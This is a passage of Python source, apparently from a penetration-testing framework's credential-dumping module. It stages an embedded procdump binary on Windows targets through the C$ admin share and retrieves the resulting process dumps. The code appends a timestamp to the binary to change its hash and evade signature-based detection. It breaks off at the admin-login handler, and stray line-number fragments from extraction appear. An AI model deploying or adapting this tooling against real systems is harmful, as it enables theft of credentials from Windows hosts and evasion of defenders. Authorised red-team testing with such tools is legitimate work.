# Module category reported in the framework's module listing; CATEGORY is imported
# from the framework (its import is outside this excerpt).
category = CATEGORY.CREDENTIAL_DUMPING
| 19 | |
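def options(self, context, module_options):
    r"""
    Read module options and stage the procdump binary for on_admin_login.

    TMP_DIR             Path where the process dump is written on the target (default: C:\Windows\Temp\).
                        Must start with a drive letter: the admin share used to pull the dump back
                        (e.g. C$) and the share-relative path are derived from it.
    PROCDUMP_PATH       Directory holding procdump.exe on your system (default: /tmp/); if set, the
                        embedded copy is not used
    PROCDUMP_EXE_NAME   Name of the procdump executable (default: procdump.exe); if set, the embedded
                        copy is not used
    DIR_RESULT          Local directory where retrieved .dmp files are stored (default: PROCDUMP_PATH)

    Raises:
        ValueError: if TMP_DIR does not start with a drive letter, since the share path
            used to retrieve the dump cannot be derived from it.
    """
    # Defaults: stage under C:\Windows\Temp\ on the target, embedded procdump, local
    # working directory TMP_PATH.
    self.tmp_dir = "C:\\Windows\\Temp\\"
    self.procdump = "procdump.exe"
    self.procdump_path = abspath(TMP_PATH)
    self.useembeded = True

    # The embedded copy is always loaded so the attribute exists whether or not it is used.
    with open(join(DATA_PATH, "procdump/procdump.exe"), "rb") as f:
        self.procdump_embeded = f.read()
    # Append a timestamp so the staged file's hash differs from the stock binary.  This is
    # hash-busting only: the suffix is not random (same second -> same hash), the PE's code
    # and imports are untouched, and the appended overlay presumably invalidates the
    # Authenticode signature — confirm if a signed binary matters in your environment.
    self.procdump_embeded += datetime.now().strftime("%Y%m%d%H%M%S").encode()

    if "PROCDUMP_PATH" in module_options:
        self.procdump_path = module_options["PROCDUMP_PATH"]
        self.useembeded = False

    if "PROCDUMP_EXE_NAME" in module_options:
        self.procdump = module_options["PROCDUMP_EXE_NAME"]
        self.useembeded = False

    if "TMP_DIR" in module_options:
        self.tmp_dir = module_options["TMP_DIR"]
        # The default carries a trailing separator and the share-relative path is built
        # from tmp_dir, so keep that invariant for user-supplied values.
        if not self.tmp_dir.endswith(("\\", "/")):
            self.tmp_dir += "\\"

    # Derive the admin share and share-relative path AFTER TMP_DIR has been applied.
    # Previously both were computed from the default before the override, so a custom
    # TMP_DIR left retrieval pointed at \Windows\Temp\ on C$ — the wrong location.
    drive, sep, rest = self.tmp_dir.partition(":")
    if not sep or len(drive) != 1 or not drive.isalpha():
        raise ValueError(f"TMP_DIR must start with a drive letter (e.g. C:\\Windows\\Temp\\), got {self.tmp_dir!r}")
    self.share = f"{drive.upper()}$"
    self.tmp_share = rest

    # DIR_RESULT defaults to PROCDUMP_PATH as documented — i.e. the value after any
    # PROCDUMP_PATH override, not the pre-override default it used to inherit.
    self.dir_result = module_options.get("DIR_RESULT", self.procdump_path)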
| 52 | |
| 53 | def on_admin_login(self, context, connection): |
| 54 | if self.useembeded is True: |